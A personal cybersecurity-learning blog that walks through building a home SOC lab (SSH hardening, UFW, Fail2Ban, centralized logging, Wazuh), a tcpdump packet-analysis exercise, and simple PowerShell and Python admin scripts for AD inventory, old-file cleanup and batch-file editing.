#learning it

Week 3-4 Centralized Logging and SIEM Installation & First Alerts

My next focus was to centralize all logs on my Ubuntu Server and begin building out my security monitoring environment using Wazuh as my SIEM. I also planned to create a few test users and deploy a Kali Linux machine to simulate potential attack activity.

I built a new VM and installed Ubuntu Desktop, enabling SSH logging and configuring the firewall. On the Ubuntu Server, I created a separate non-root user account following the principle of least privilege. I then allowed SSH access through the firewall on port 22, but only from the specific IP address of the Ubuntu Desktop user.

 To start, I created a new standard user that would serve as my baseline active user. This user was assigned to an Ubuntu Desktop virtual machine and would represent a normal, non-administrative user interacting with the environment.

Next, I set up a Kali Linux VM and updated all installed packages. From Kali, I attempted to SSH into the Ubuntu Server. The connection was denied due to the firewall rules restricting access to only the trusted desktop user’s IP. I checked the Ubuntu Server logs and confirmed that the attempted connection was detected and logged, including the source IP, which matched the Kali machine.

The goal was to monitor their activity, capture both successful and failed login attempts, and observe how the system logged and responded to these events.

I then set up the firewall to allow from the ubuntu user IP address and port 514 and set up a configuration file to transfer all the logs from my Ubuntu user to the Ubuntu server.

Then I did the same thing to my Kali Machine, except for the allowing SSH from it. I did this to also monitor activity on it as well.

I then checked that all the logs were being sent into the Ubuntu server and I could see that both the Kali and the Ubuntu users logs were being sent.

Once everything was configured, I logged into the server from the desktop user and reviewed the logs to confirm successful authentication. After that, I intentionally entered an incorrect password multiple times to generate failed login events. As expected, Fail2Ban triggered after five failed attempts and temporarily blocked further SSH attempts from that IP. I reviewed the logs to verify that both the failed logins and the Fail2Ban action were properly recorded and centralized.

This setup allowed me to validate that my firewall, authentication logging, and centralized log monitoring were working as intended before moving forward with Wazuh integration. I then Installed the Wazuh Manager on my Ubuntu Server, and then put a Wazuh Agent on my Ubuntu User and on my Kali and soon they were reporting on events that were happening in My Lab.

I know it has been forever since I have written anything here, but I am finally back at it. I now have a lab and have been going through the setup process. Making my own Virtual network and running my lab. So let's start, the first week,

I built an Ubuntu server and began to harden it.

I started by installing using VirtualBox and installing the ISO onto my lab.

Booting up the Ubuntu server, I set up the first admin user. Then began to work on upgrading and learning the ins and outs of the server.

SSH login user rules

Then setting up SSH, establishing rules for logging in, and least privilege with the user.

I did this by editing the sshd_config file

permitrootlogin no

PasswordAuthentication yes

pubkeyauthentication yes

maxauthtries 3

login grace time 30

Then, I just restarted the ssh.

I made a non-root user and assigned them a password.

2. Firewall access

Moving into the UFW (Universal Firewall), I wanted to isolate my network as much as possible.

First, I started by denying all incoming and allowing outgoing, making sure everything was secure.

Enabled my wired connection on port 1999. For when I install Netdata.

I then allowed connections from my main lab to other things I use for remote access, but still kept it secure.

3. Install Automatic Security Updates

I understand that patch fatigue can be a major problem, and setting up automation is key. Things will be missed.

I installed Unattended-Upgrades, then enabled them and verified the config files.

4. Basic Audit and Verification

I then went back and started to work on basic Verification

Checked that the Systems were running.

Checked and made notes about the current users

Finally checked the Auth Logs.

This was the end of my first week. I am trying to work at least a few hours a week on my lab.

Cyberlab Fail2Ban, & Netdata Install

Installed Fail2ban

I installed Fail2ban and made sure it was running.

Then I made a new Jail.local file for fail2ban.

Installed Netdata

I installed Netdata so I could have a GUI to be able to look at the data as it moved through my system.

After everything was succesfuly I logged into the Web Interface of Net Data and ran a stress test.

So the other day I was at work and was wondering if there was a way to check all the PC's on the network and find out when the last time they were active.

I then began to write something in PowerShell. I also wanted the Computer name and the last user who was logged into the PC. Just to make a list of older PCs on the network, and users we need to clean up in AD.

Using AD, I could get most of the information I needed, and then using SSH to reach out to every PC and update the latest information. How it would work is it would ping the pc to see if it was active, then using SSH to get the information I wanted. I also wanted it to be placed into a spreadsheet to be able to send it to the Sys Admins.

Now, to use this, you will need to run PowerShell as an administrator.

Here is the code

$computers = Get-ADComputer -Filter * -Property Name, LastLogonTimestamp

$results = @()

foreach ($computer in $computers) { $compName = $computer.Name $lastLogon =[DateTime]::FromFileTime($computer.LastLogonTimestamp)

Write-Host "Checking $compName..." -ForegroundColor Cyan

# Set a default value

$lastUser = "Unknown or Offline"

# Try to ping and connect if the machine is online

if (Test-Connection -ComputerName $compName -Count 1 -Quiet) { try {

# Try to grab the last logged-on user

$sysInfo = Get-CimInstance -ClassName Win32_ComputerSystem -ComputerName $compName

$lastUser = $sysInfo.UserName $model = $sysInfo.Model } catch { $lastUser = "Access Denied" } } else { $lastUser = "Offline" }

$results += [PSCustomObject]@{ ComputerName = $compName LastLogonToAD = $lastLogon LastLoggedInUser = $lastUser SystemModel = $model } }

Display

$results | Sort-Object LastLogonToAD -Descending | Format-Table -AutoSize

Optional: export to CSV

$desktop = [Environment]::GetFolderPath("Desktop") $path = Join-Path -Path $desktop -ChildPath "PC_LastLogonAndUser.xlsx"

Lately I have been playing with TCP Dump, I prefer Wireshark when it comes to monitoring network traffic using a packet sniffer. But a person in IT Cybersecurity should be able to work with multiple different Programs.

TCP dump is available on the Kali Linux program set used to monitor traffic on a network. Often used by both SOC personal and attackers alike.

Now this lab was created by the Group Black Hills Info Sec. A very good company that not only offers Cybersecurity services, but also they have a love for teaching and have many classes available for pay what you can. I will link there site. This set of classes are part of the SOC Entry Level Class.

Lets look at the lab.

I started by getting into root, then running TCP Dump. This is what showed up first.

Looking at the information provided, I can see the time stamp, the Protocol, IP address and source IP address. Most of this information can be very useful when your trying to look for anything out of the ordinary on your system.

Next I went ahead and added a port number, port 80. A common port used offten by threat actors to compromise networks.

The command I used was tcpdump -n -r magnitude_1hr.pcap host 192.168.99.52 and port 80

and this is all the information that came up.

Now when I saw this I really felt over whelmed with information. There is a lot being tossed at you and most of it is encrypt and I can not read it. But you can pic out some information, such as the HTTP and normal IP Addresses.

Next I turned to the ASCII to decode the packets. Running, tcpdump -n -r magnitude_1hr.pcap host 192.168.99.52 and port 80 -A

This narrowed down the flow of information also cleared up the encryption and I could physically sort through the data and noticed a few things.

Looks like something is running Powershell $ signs. Now powershell is not normally something that you would see running on an average users PC. Maybe if they were IT but I would not be to sure about this. What really make me have to think was when I saw the Base 64.

Now at first I will confess I had no clue what Base 64 is or what it is used for. So I had to do some googling this is what I found, Base 64 is used to encode binary data as printable text. So I have to ask my self, “What does that mean?” Well looking deeper it is used to transport binary over protocols that normally would not be able to. This would allow someone with access to send commands to say run Powershell.

File Scanner

This program is more of a scanner to search a server and find all the older files. I set it up to scan for older files that are over 7 years old and compile them into an excel file so they can be reviewed before deletion. This is a good program for users for file retention policies. Also to find those information hoarders.

Now the program will ask you for a file path, then ask where you want to store the excel folder.

import os import datetime from openpyxl import Workbook from tkinter import filedialog import tkinter as tk

def get_file_creation_time(file_path): """ Get the creation time of a file. """ print("File path:", file_path) #Debug Print try: return datetime.datetime.fromtimestamp(os.path.getctime(file_path)) except OSError as e: print("Error:", e) #debug print return None

def get_file_size(file_path): """ Get the size of a file. """ return os.path.getsize(file_path)

def list_old_files(folder_path, output_directory): """ List files older than 7 years in a folder and store their information in an Excel file. """ # Initialize Excel workbook wb = Workbook() ws = wb.active ws.append(["File Name", "File Path", "Creation Date", "Size (bytes)"])

# Get current date current_date = datetime.datetime.now()

# Traverse through files in the folder for root, dirs, files in os.walk(folder_path): for file in files: file_path = os.path.join(root, file) creation_time = get_file_creation_time(file_path) if creation_time is None: continue #Skip files that could not be retrived

file_age = current_date - creation_time if file_age.days > 7 * 365: # Check if file is older than 7 years file_size = get_file_size(file_path) ws.append([file, file_path, creation_time.strftime('%Y-%m-%d %H:%M:%S'), file_size])

# Save Excel file to the specified directory output_excel = os.path.join(output_directory, "old_files.xlsx") wb.save(output_excel) print("Old files listed and saved to", output_excel)

if __name__ == "__main__": # Initialize Tkinter root = tk.Tk() root.withdraw() # Hide the main window

# Ask for folder path folder_path = filedialog.askdirectory(title="Select Folder")

# Ask for output directory output_directory = filedialog.askdirectory(title="Select Output Directory")

list_old_files(folder_path, output_directory)

------------------------------------------------------------------------------

Older file Scanner and Delete

Working in the IT field, you will find that the users will fill up the space on the servers with older files.

Especially if you work within an industry that needs to have document retention policies where you can not keep some documents longer than a certain amount of time or you just have hoarders on your network. You will know those people who do not delete anything and save everything.

So I wrote up a program that will search through a selected server and find all empty files, older files, and delete them.

import os import datetime import tkinter as tk from tkinter import filedialog

def list_files_and_empty_folders_to_delete(folder_path): # Get the current date current_date = datetime.datetime.now()

# Calculate the date seven years ago seven_years_ago = current_date - datetime.timedelta(days=7*365)

files_to_delete = [] empty_folders_to_delete = []

# Iterate over files and folders recursively for root, dirs, files in os.walk(folder_path, topdown=False): # Collect files older than seven years for file_name in files: file_path = os.path.join(root, file_name) # Get the modification time of the file file_modified_time = datetime.datetime.fromtimestamp(os.path.getmtime(file_path)) # Check if the file is older than seven years if file_modified_time < seven_years_ago: files_to_delete.append(file_path)

# Collect empty folders for dir_name in dirs: dir_path = os.path.join(root, dir_name) if not os.listdir(dir_path): # Check if directory is empty empty_folders_to_delete.append(dir_path)

return files_to_delete, empty_folders_to_delete

def delete_files_and_empty_folders(files_to_delete, empty_folders_to_delete): # Print files to be deleted print("Files to be deleted:") for file_path in files_to_delete: print(file_path)

# Print empty folders to be deleted print("\nEmpty folders to be deleted:") for folder_path in empty_folders_to_delete: print(folder_path)

# Confirmation before deletion confirmation = input("\nDo you want to proceed with the deletion? (yes/no): ") if confirmation.lower() == "yes": # Delete files for file_path in files_to_delete: os.remove(file_path) print(f"Deleted file: {file_path}")

# Delete empty folders for folder_path in empty_folders_to_delete: os.rmdir(folder_path) print(f"Deleted empty folder: {folder_path}") else: print("Deletion canceled.")

def get_folder_path(): root = tk.Tk() root.withdraw() # Hide the main window

folder_path = filedialog.askdirectory(title="Select Folder") return folder_path

# Ask for the folder path using a dialog box folder_path = get_folder_path()

# Check if the folder path is provided if folder_path: # List files and empty folders to be deleted files_to_delete, empty_folders_to_delete = list_files_and_empty_folders_to_delete(folder_path) # Delete files and empty folders if confirmed delete_files_and_empty_folders(files_to_delete, empty_folders_to_delete) else: print("No folder path provided.")

______________________________________________________________

Batch File Mod

This program is used for when you need to mod Batch files. Any person in IT that has had to manage Batch files for a large company can think how annoying it would be to go through each one and make a single line change.

Well this program is made to search through all the batch files and you can write in a line, and it will replace it with another line you choose.

import os

def find_files_with_text(directory_path, text_to_find): files_with_text = [] for root, _, files in os.walk(directory_path): for file_name in files: if file_name.endswith('.bat'): file_path = os.path.join(root, file_name) with open(file_path, 'r') as file: if any(text_to_find in line for line in file): files_with_text.append(file_path) return files_with_text

def remove_line_from_file(file_path, text_to_remove): try: with open(file_path, 'r') as file: lines = file.readlines()

with open(file_path, 'w') as file: for line in lines: if text_to_remove not in line: file.write(line)

print(f"Removed lines containing '{text_to_remove}' from {file_path}.")

except FileNotFoundError: print(f"Error: The file {file_path} does not exist.") except Exception as e: print(f"An error occurred: {e}")

def process_directory(directory_path, text_to_remove): files_with_text = find_files_with_text(directory_path, text_to_remove)

if not files_with_text: print(f"No files found containing the text '{text_to_remove}'.") return

for file_path in files_with_text: print(f"Found '{text_to_remove}' in {file_path}") user_input = input( f"Do you want to remove the line containing '{text_to_remove}' from {file_path}? (yes/no): ").strip().lower() if user_input == 'yes': remove_line_from_file(file_path, text_to_remove) else: print(f"Skipped {file_path}.")